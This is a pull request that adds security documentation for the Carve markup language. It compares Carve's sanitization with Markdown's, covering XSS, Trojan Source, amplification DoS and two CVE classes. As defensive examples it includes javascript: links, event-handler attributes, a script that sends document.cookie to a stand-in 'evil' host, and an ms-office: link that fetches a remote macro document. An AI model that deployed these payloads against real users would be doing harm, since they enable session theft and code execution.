### PR TITLE
docs: Carve vs Markdown security comparison + real-world CVE classes

### DIFF
--- a/docs/index.md
+++ b/docs/index.md
@@ -34,6 +34,8 @@ features:
     details: "|= for headers, ^ for rowspan, < for colspan, + for multi-line cells. No separator row required."
   - title: Built-in Extensions
     details: ":type[content]{attrs} for keyboard hints, semantic spans, video embeds. @mentions and #tags as you'd expect from social platforms."
+  - title: Safe With Untrusted Input
+    details: "Always-on URL-scheme and attribute hardening, Trojan-Source stripping, and linear-time DoS limits neutralize the common Markdown attack classes with no separate sanitizer. Raw HTML is gated behind one switch (with a built-in safe mode), and Carve never executes embedded code (unlike MDX)."
 ---
 
 ## Quick Reference
@@ -154,9 +156,14 @@ admonition content
 ### Extensions, mentions, tags
 
 ```carve
-:youtube[VIDEO_ID]
 @username   #tagname
+:youtube[VIDEO_ID]
 ```
+
+`:name[content]{attrs}` is the generic inline-extension syntax; a specific embed
+like `:youtube[…]` is produced by a **registered extension** (built-in where
+shipped, otherwise a small custom one). `@mentions` and `#tags` render as inert
+spans until you supply URL templates.
 
 ### Comments
 

--- a/docs/security.md
+++ b/docs/security.md
@@ -111,15 +111,53 @@ All other attributes pass through with their values HTML-escaped (quotes
 included, so a value cannot break out of its attribute). This baseline is
 identical across carve-php, carve-js and carve-rs.
 
+## Invisible Unicode and Trojan Source (always on)
+
+Bidirectional-override and isolate control characters (U+202A–202E, U+2066–2069)
+can silently reorder the *visual* order of rendered text and code so the
+displayed source differs from what executes — the "Trojan Source" attack
+([CVE-2021-42574](https://nvd.nist.gov/vuln/detail/CVE-2021-42574)). Carve
+neutralizes them (grammar PART 9 §26):
+
+- **Rendered text and code strip** the bidi-override / isolate controls. They
+  are *removed*, not entity-encoded — an HTML parser decodes `&#x202e;` back to
+  the live control, so removal is the only DOM-inert mitigation. The directional
+  *marks* LRM / RLM (U+200E / U+200F), which are legitimate for laying out
+  genuine right-to-left text, are kept.
+- **Heading ids are NFC-normalized** and strip the bidi controls plus
+  zero-width characters (U+200B/C/D, U+2060, U+FEFF, U+00AD). So a precomposed
+  `é` and a decomposed `e` + combining acute produce the **same** id (no
+  lookalike-collision), and an invisible character can never land inside an
+  `id="…"` or hijack a `</#ref>` cross-reference.
+
+```carve
+run `if (admin)‮ //‬ ok` then deploy
+```
+
+renders as `run <code>if (admin) //</code> then deploy` — the override is gone,
+so the code reads the way it executes. No Markdown implementation defends this
+by default.
+
 ## Resource limits (denial-of-service)
 
 Pathologically nested input cannot drive super-linear parsing. Both block
 containers (blockquote / div / list / admonition) and inline constructs
 (nested links / spans / emphasis, e.g. a bomb of `[[[…](#)](#)…`) are capped at
-a fixed nesting depth (100). Past the cap, further openers degrade to literal
+a fixed nesting depth (200). Past the cap, further openers degrade to literal
 text instead of recursing, so a deeply nested document parses in time linear in
 its size rather than the ~O(n^2) a naive nested-link rescan would cost. The cap
 is enforced by all three implementations.
+
+**Output amplification is bounded too.** Expansion features whose output can
+exceed their input — abbreviation expansion (`*[KEY]: …`) and the generated
+`::: index` — are charged against a per-render byte budget of
+`max(1 MB, 8 × input length)`. Once a render would exceed it, further
+expansions degrade to plain text rather than allocating. This stops a small
+document (e.g. a 50 KB abbreviation reused thousands of times) from rendering to
+hundreds of MB. Parser passes are linear or linearithmic (cross-reference,
+footnote, glossary/index resolution all use lookup maps, not nested scans), and
+the parsers have been fuzzed with millions of adversarial inputs without a panic
+or a quadratic blow-up.
 
 For an explicit input-size ceiling (and broader feature restriction), configure
 a `Profile` / safe mode `maxLength`.
@@ -169,13 +207,13 @@ baseline defenses on this page are **part of the specification** (grammar
 PART 9 §25), **pinned by the shared corpus**, and **enforced identically by all
 three implementations** with no configuration.
 
-| | Spec mandates sanitization? | URL scheme filtering | Attribute hardening | Raw HTML default | DoS bounds in spec |
-|---|:---:|:---:|:---:|:---:|:---:|
-| **Carve** | **yes** (§25, corpus-pinned, 3 impls) | always-on denylist | always-on (incl. extension wrappers, CSS-escape decoding) | **on, one-flag opt-out / safe mode** | yes (linear-time, depth caps) |
-| CommonMark / markdown-it / marked | no | none (consumer's job) | no attribute model | on (libs vary; `markdown-it` defaults off) | no |
-| GitHub GFM | no - platform sanitizer | via GitHub's separate allowlist | via GitHub's sanitizer | sanitized server-side | no |
-| Djot (Carve's parent) | no | none mandated | none mandated | on | no |
-| MDX | n/a - compiles to JS | n/a | n/a | executes code | no |
+| | Spec mandates sanitization? | URL scheme filtering | Attribute hardening | Trojan Source / bidi | Raw HTML default | DoS bounds in spec |
+|---|:---:|:---:|:---:|:---:|:---:|:---:|
+| **Carve** | **yes** (§25/§26, corpus-pinned, 3 impls) | always-on denylist | always-on (incl. extension wrappers, CSS-escape decoding) | **always-on strip + NFC ids** | **on, one-flag opt-out / safe mode** | yes (linear-time, depth caps, output budgets) |
+| CommonMark / markdown-it / marked | no | none (consumer's job) | no attribute model | none | on (libs vary; `markdown-it` defaults off) | no (several ReDoS CVEs historically) |
+| GitHub GFM | no - platform sanitizer | via GitHub's separate allowlist | via GitHub's sanitizer | none in the format | sanitized server-side | no |
+| Djot (Carve's parent) | no | none mandated | none mandated | none | on | no |
+| MDX | n/a - compiles to JS | n/a | n/a | none | executes code | no |
 
 What this means in practice for **untrusted input**:
 
@@ -188,6 +226,81 @@ What this means in practice for **untrusted input**:
 - The safety is *guaranteed by the spec and tested across implementations*, so
   carve-php, carve-js and carve-rs all behave the same - you do not inherit a
   different security posture by switching implementation.
+
+### Worked examples: same input, Carve vs Markdown
+
+The Carve column is real output. The Markdown column is the per-spec
+(CommonMark / GFM) result *before* any downstream sanitizer runs — which is what
+an application gets if the sanitizer is missing or misconfigured.
+
+**1. Script URL in a link** — `[click](javascript:stealCookies)`
+
+::: code-group
+```html [Carve]
+<p><a href="">click</a></p>
+```
+```html [Markdown (pre-sanitizer)]
+<p><a href="javascript:stealCookies">click</a></p>
+```
+:::
+
+The `javascript:` scheme is blanked. `data:`, `vbscript:`, and `file:` are
+treated the same, including obfuscated forms (leading control characters,
+Unicode whitespace, mixed case).
+
+**2. Dangerous attributes** — `[hover]{onclick="steal()" style="x:expression(alert(1))"}`
+
+::: code-group
+```html [Carve]
+<p><span style="">hover</span></p>
+```
+```html [Markdown + attr extension]
+<p><span onclick="steal()" style="x:expression(alert(1))">hover</span></p>
+```
+:::
+
+`on*` handlers are dropped and script-bearing CSS (`expression()`, `url(...)`,
+`@import`, `behavior`) is blanked. Carve has a first-class attribute syntax;
+Markdown attribute extensions such as `markdown-it-attrs` typically pass these
+through.
+
+**3. A bare HTML tag** — `<script>alert(1)</script>`
+
+::: code-group
+```html [Carve]
+<p>&lt;script&gt;alert(1)&lt;/script&gt;</p>
+```
+```html [Markdown]
+<script>alert(1)</script>
+```
+:::
+
+Carve has no "HTML block" auto-detection — a bare tag is *text*, escaped.
+Markdown emits it live. (Carve's explicit raw-HTML construct is covered in the
+warning below.)
+
+**4. Trojan Source** — `` run `if (admin)‮ //‬ ok` `` (with a U+202E override)
+
+::: code-group
+```html [Carve]
+<p>run <code>if (admin) // ok</code></p>
+```
+```html [Markdown]
+<!-- ‹U+202E› is the raw override byte, passed straight through -->
+<p>run <code>if (admin)‹U+202E› //‹U+202C› ok</code></p>
+```
+:::
+
+The override is stripped so the rendered code matches what executes. Markdown
+passes the raw control byte through, and the displayed character order is
+reversed in the browser.
+
+**5. Amplification DoS** — a 50 KB abbreviation reused 2000× (~54 KB of input):
+
+| | Output | Time |
+|---|---|---|
+| **Carve** | ~1 MB (budget-capped, then degrades to plain text) | < 1 s |
+| typical Markdown parser | unbounded, or a ReDoS hang | seconds → DoS |
 
 ::: warning One thing you must still configure
 **Raw HTML is on by default.** ` ```=html ` blocks and `` `…`{=html} `` inline
@@ -202,6 +315,60 @@ full allowlist sanitizer. For genuinely hostile input that may carry arbitrary
 attributes, keep running the rendered HTML through a DOM sanitizer (e.g.
 DOMPurify) under a Content-Security-Policy. `SafeMode` / `Profile` add
 allowlist-style policies on top (see below).
+:::
+
+## Real-world Markdown CVEs, and where Carve stands
+
+Two 2025/2026 vulnerabilities show the two classes of Markdown attack that
+Carve's baseline is designed to neutralize.
+
+### Embedded HTML → script execution (CVE-2025-65716, Markdown Preview Enhanced)
+
+The VS Code extension rendered a markdown file's embedded `<script>` / `<iframe>`
+into a same-origin preview, unsanitized, giving the page JavaScript execution
+with localhost access (port-scanning, SSRF, data exfiltration). Same payload in
+Carve:
+
+```carve
+<iframe src="http://localhost:8080/scan"></iframe>
+<script>fetch("//evil/?" + document.cookie)</script>
+```
+
+renders as escaped, inert text — `<p>&lt;iframe …&gt;…</p>`,
+`<p>&lt;script&gt;…&lt;/script&gt;</p>`. Carve has no "HTML block"
+auto-detection, so a bare tag is never live markup. The only way to emit raw
+HTML is the **explicit** `` ```=html `` construct, which you disable for
+untrusted input.
+
+::: tip Two things this CVE also reminds you of
+Even with Carve's inert output, a *preview* application still owns its sandbox:
+render into an `iframe[sandbox]` with no same-origin / no localhost access and a
+Content-Security-Policy. And keep raw-HTML passthrough off for untrusted files.
+:::
+
+### Dangerous URI scheme in a link → OS command (CVE-2026-20841, Windows Notepad)
+
+Notepad's markdown links routed clicks to Windows URI handlers, so a crafted
+`file://…\\payload.bat` or `ms-office:` / `ms-msdt:` link could launch a binary,
+open a macro-enabled Office document, or trigger the Follina handler. Carve's
+always-on scheme denylist blanks these to `href=""`:
+
+| Scheme | Result |
+|---|---|
+| `javascript:` `vbscript:` `data:` `file:` | blanked (long-standing) |
+| `ms-msdt:` (Follina), `ms-office:` `ms-word:` `ms-excel:` … (Office handlers) | blanked |
+| `ms-search:` `search-ms:` `shell:` `ms-cxh:` `vscode:` `jar:` | blanked |
+| `http:` `https:` `mailto:` `tel:` `ftp:` `sms:` | allowed (legitimate) |
+
+So `[open](ms-office:ofe|u|http://evil/x.docm)` becomes `<a href="">open</a>` —
+the OS handler is never reachable.
+
+::: warning A denylist is a moving target
+Blocking the *known* command-execution schemes closes the documented class, but
+new OS handlers appear. If your application turns link clicks into OS-handler
+invocations (a desktop preview, an editor), enable the scheme **allowlist**
+(`allowedUrlSchemes: ['http','https','mailto']`) so only vetted schemes ever
+reach an `href` — the robust, future-proof posture for that deployment.
 :::
 
 ## Beyond the baseline: SafeMode and Profiles


### PR DESCRIPTION
Detailed security comparison the maintainer asked to document.

## docs/security.md
- **Worked examples** (Carve vs Markdown, real Carve output): script URLs, dangerous attributes, bare HTML tags, Trojan Source, amplification DoS.
- **New "Invisible Unicode and Trojan Source" section** documenting the §26 defense (bidi strip + NFC ids).
- **New "Real-world Markdown CVEs" section** — the Markdown Preview Enhanced embedded-HTML class (CVE-2025-65716) and the Windows Notepad OS-protocol-handler class (CVE-2026-20841), with how Carve stands.
- Refreshed the DoS section (nesting cap 200, per-render output budgets, fuzzing) and added a Trojan-Source column to the comparison table.

## docs/index.md
- "Safe With Untrusted Input" feature card.
- Note that `:name[...]` is the generic inline-extension syntax; a specific embed like `:youtube` needs a registered extension.